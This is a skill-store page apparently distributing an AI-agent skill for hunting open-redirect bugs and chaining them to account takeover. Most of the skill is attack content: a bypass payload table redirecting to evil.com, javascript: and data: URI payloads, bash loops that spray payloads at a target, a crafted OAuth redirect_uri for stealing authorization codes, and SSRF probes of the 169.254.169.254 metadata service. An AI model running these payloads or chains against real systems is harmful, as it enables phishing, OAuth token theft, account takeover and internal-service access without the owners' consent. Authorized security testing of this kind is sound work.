‹ 首页

hunt-open-redirect

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

Hunt Open Redirect — all types including low-impact, chained to OAuth token theft → ATO, phishing chains. URL parameter manipulation, JavaScript redirect, meta refresh, header injection. Use when hunting redirect bugs or building ATO chains.

适合你,如果你在寻找开放重定向漏洞或构建账户接管攻击链

/ 下载安装
hunt-open-redirect.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/hunt-open-redirect
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-open-redirect
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/hunt-open-redirect
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~1.2K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

安装后,Claude 会帮你发现网站上的开放重定向漏洞,包括基础类型和绕过技巧,并检查能否与 OAuth 令牌窃取等攻击链结合。

什么时候触发

当你要求测试某个网站的重定向漏洞,或需要构建 OAuth 账户接管攻击链时触发。

装好后可以这样说
Claude 会提取候选参数并测试。
Claude 会构造攻击 URL 并检查。
Claude 会展示绕过表。
技能原文 SKILL.md作者撰写 · MIT · 05098fc

HUNT-OPEN-REDIRECT — Open Redirect

Crown Jewel Targets

Open redirect alone is Low. Chained to OAuth = Critical (ATO).

Highest-value chains:

  • Open redirect → OAuth auth code theft — redirect_uri contains open redirect on trusted domain → auth code sent to attacker → ATO
  • Open redirect → phishing — users trust the URL because it starts with target.com
  • Open redirect → SSRF escalation — if redirect followed server-side → SSRF
  • Open redirect → session fixation — force user to login endpoint with pre-set session

Attack Surface Signals
?redirect=
?next=
?url=
?return=
?returnTo=
?continue=
?dest=
?destination=
?go=
?forward=
?location=
?target=
?redir=
?redirect_uri=
?callback=
?checkout_url=
?success_url=
?cancel_url=
/logout?returnTo=
/login?next=
/sso?callback=

Bypass Table

| Technique | Payload | |-----------|---------| | Basic | https://evil.com | | Protocol relative | //evil.com | | Backslash bypass | /\\evil.com | | At-sign confusion | https://target.com@evil.com | | Double slash | //evil.com/%2F.. | | URL encoding | %2Fevil.com | | Null byte | evil.com%00target.com | | Whitespace | evil.com%09 or %20 | | JavaScript URI | javascript:window.location='https://evil.com' | | Data URI | data:text/html,<script>window.location='https://evil.com'</script> | | Subdomain | https://target.com.evil.com | | Fragment | https://evil.com#.target.com |


Step-by-Step Hunting Methodology
Phase 1 — Discover Redirect Parameters
# Extract all redirect candidates from crawl
cat recon/$TARGET/urls.txt | gf redirect > recon/$TARGET/redirect-candidates.txt
wc -l recon/$TARGET/redirect-candidates.txt

# Less common param names
grep -E "(\?|&)(return|next|dest|go|forward|location|to|jump|target|out|link|logout)" \
  recon/$TARGET/urls.txt >> recon/$TARGET/redirect-candidates.txt
Phase 2 — Basic Test
COLLAB="https://evil.com"
cat recon/$TARGET/redirect-candidates.txt | qsreplace "$COLLAB" | while read url; do
  LOC=$(curl -s -I --max-redirs 0 "$url" | grep -i "^location:")
  STATUS=$(curl -s -o /dev/null -w "%{http_code}" --max-redirs 0 "$url")
  [ -n "$LOC" ] && echo "$STATUS | $LOC | $url"
done
Phase 3 — Bypass Techniques
BASE_URL="https://$TARGET/redirect?url="
PAYLOADS=(
  "https://evil.com"
  "//evil.com"
  "/\\evil.com"
  "https://$TARGET@evil.com"
  "https://evil.com%23.$TARGET"
  "https://evil.com%09"
)
for P in "${PAYLOADS[@]}"; do
  LOC=$(curl -s -I --max-redirs 0 "${BASE_URL}${P}" | grep -i "^location:")
  echo "$P → $LOC"
done
Phase 4 — OAuth Chain Test
# If target has OAuth, check if redirect_uri accepts open redirect
grep -i "oauth\|authorize\|redirect_uri" recon/$TARGET/urls.txt | head -20

# Construct OAuth URL with open redirect as redirect_uri
# Normal: redirect_uri=https://target.com/callback
# Attack: redirect_uri=https://target.com/redirect?url=https://evil.com
OAUTH_URL="https://$TARGET/oauth/authorize"
curl -sv "$OAUTH_URL?response_type=code&client_id=CLIENT_ID&redirect_uri=https://$TARGET/redirect%3Furl%3Dhttps%3A%2F%2Fevil.com" 2>&1 | grep -i "location:"
Phase 5 — Server-Side Redirect (SSRF escalation)
# If the app fetches the redirect target server-side (302 fetch follow)
curl -s "https://$TARGET/proxy?url=https://evil.com/redirect-to-169.254.169.254/latest/meta-data/"

# Or: if app makes HTTP request to the redirect destination
curl -s "https://$TARGET/fetch?url=http://169.254.169.254/latest/meta-data/" \
  -H "Cookie: $SESSION"

Automation
# openredirex
pip3 install openredirex
openredirex -l recon/$TARGET/redirect-candidates.txt -p evil.com

# nuclei
nuclei -u https://$TARGET -t redirect/ -severity medium,high

# gf + qsreplace
cat recon/$TARGET/urls.txt | gf redirect | qsreplace "https://evil.com" | \
  xargs -I{} curl -s -o /dev/null -w "%{http_code} %{redirect_url}\n" --max-redirs 0 {}

Chain Table

| Open redirect finding | Chain to | Impact | |----------------------|----------|--------| | Any open redirect | OAuth redirect_uri bypass | Auth code theft → ATO | | Any open redirect | Phishing URL with target domain | Social engineering | | Server-side redirect | SSRF via followed redirect | Internal service access | | Logout redirect | Session fixation | Force login with known session |


Validation

✅ Location header in response points to evil.com (your controlled domain) ✅ Browser follows redirect to attacker-controlled page

Severity:

  • Redirect alone: Low (most programs)
  • Chains to OAuth code theft → ATO: High/Critical
  • Chains to phishing with brand name: Low-Medium
  • Server-side → SSRF: High
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。